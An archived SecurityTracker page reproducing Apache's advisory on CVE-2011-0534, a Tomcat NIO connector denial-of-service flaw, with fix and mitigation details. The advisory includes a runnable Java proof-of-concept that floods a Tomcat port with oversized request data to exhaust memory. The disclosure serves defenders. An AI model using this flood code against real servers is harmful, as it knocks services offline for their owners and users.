SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Web Server/CGI)  >   Apache Tomcat Vendors:   Apache Software Foundation
Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
SecurityTracker Alert ID:  1025027
SecurityTracker URL:  http://securitytracker.com/id/1025027
CVE Reference:   CVE-2011-0534   (Links to External Site)
Date:  Feb 7 2011
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6.0.0 to 6.0.30, 7.0.0 to 7.0.6
Description:   A vulnerability was reported in Apache Tomcat. A remote user can cause denial of service conditions.

The system does not enforce the maxHttpHeaderSize limit when parsing the request line in the NIO HTTP connector. A remote user can send specially crafted data to cause an OutOfMemoryError error.

Impact:   A remote user can cause denial of service conditions.
Solution:   The vendor has issued a fix (7.0.8).
Vendor URL:  tomcat.apache.org/security.html (Links to External Site)
Cause:   State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Mar 11 2011 (Red Hat Issues Fix for JBoss) Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service   (bugzilla@redhat.com)
Red Hat has issued a fix for JBoss Enterprise Web Server 1.0.
Mar 11 2011 (Red Hat Issues Fix for JBoss) Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service   (bugzilla@redhat.com)
Red Hat has issued a fix for JBoss Enterprise Web Server 1.0.1.
Jul 22 2011 (Novell Issues Fix for Novell Vibe OnPrem) Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
Novell has issued a fix for Novell Vibe OnPrem.
Jul 22 2011 (Novell Issues Fix for Novell Teaming) Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
Novell has issued a fix for Novell Teaming.



 Source Message Contents

Date:  Sat, 05 Feb 2011 02:05:38 +0000
Subject:  [SECURITY] CVE-2011-0534 Apache Tomcat DoS vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE-2011-0534 Apache Tomcat DoS vulnerability

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- - Tomcat 7.0.0 to 7.0.6
- - Tomcat 6.0.0 to 6.0.30

Description:
Tomcat did not enforce the maxHttpHeaderSize limit while parsing the
request line in the NIO HTTP connector. A specially crafted request
could trigger an DoS via an OutOfMemoryError.

Example (AL2 licensed):
package bug50631;

import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;

public class FloodClient1 {
    static final int k_step = 10;
    static byte[] value = new byte[k_step * 1024];

    public static void main(String[] args) throws Exception {
        int i = 0;
        while (i < value.length) {
            value[i++] = 13;
        }
        SocketAddress addr = new InetSocketAddress("localhost", 8080);
        Socket socket = new Socket();
        socket.setSoTimeout(0);
        socket.connect(addr, 0);
        OutputStream os = socket.getOutputStream();
        // InputStream is = socket.getInputStream();

        int k = k_step;
        int m = 0;
        int k100 = 100;
        while (m < 2000) {
            if (k >= k100) {
                k100 += 100;
                System.out.print('.');
                System.out.flush();
            }
            if (k >= 1024) {
                m++;
                k -= 1024;
                k100 = 100;
                System.out.println(" " + m + " Mb");
            }
            os.write(value);
            os.flush();
            Thread.sleep(1);
            k+=k_step;
        }
    }
}

Mitigation:
Users of affected versions should apply one of the following mitigations
- - Upgrade to a Tomcat version where this issue is fixed
- - Use a BIO or AJP HTTP connector in place of an NIO HTTP connector

Credit:
The issue was identified by the Tomcat security team.

References:
https://issues.apache.org/bugzilla/show_bug.cgi?id=50631
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJNTLBxAAoJEBDAHFovYFnnVFsQAIE5bU+2aJccXjnlYkEZAr4S
aXmHOCqTOzaW5ob3hPhpFmOwZx3Miabx9fJPRGnCb8CEihz00soYbMcTRHbgDqXA
d/bXMr4xjZF80AM/cWng0vmDbgnLbhVUkGwNqLtuU2rjyxfnRNKBkc0CDIoDQ1FV
zkm5uW9DYTpCmcRo13IhCPanY1DRA/+QiUxriofeUPuz6skiUuyBiY95GDQNOvSo
GofEJt39DBnPDb2kzonkQTERo2OgSIPDgLeas3/pawHGsQXaBH3dwOsRQESExJS+
kT5xuhUuqynWNGXnimG0x8yCDe7+SujiAmSjTSrblBIanOtIt3SxjSe9+SasSQih
jNO/M87aQ/znmlIlVeS4F+OFuWSuBUB+GjpZn1L77pG+/yWiHurhUuAXM2borB9c
I45c2yuYstki7ej9buHXpy5l4d6A28FT61V6E2sENM9RMMHFY7cUJmorbsBf1qj2
ei+h9QEcNiwg/on0apg9pU+B1PCZxGR7G/8aMCXFfkri4opeAXy7ZpJfk+k2zI64
S8edezROjZxgztqZKydpFn2MrQ9tUmoioZHUEiZqAuPVfszXvUdLZsSFh+7A6+4D
jL+T7jIt9wsCxsZJ1+8X03nEkD7Yop+kHvUmMjyM4XEKLReI+PoXfYBrNou7Nhvm
niulExg4qtuJplCbEw8k
=06CU
-----END PGP SIGNATURE-----
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC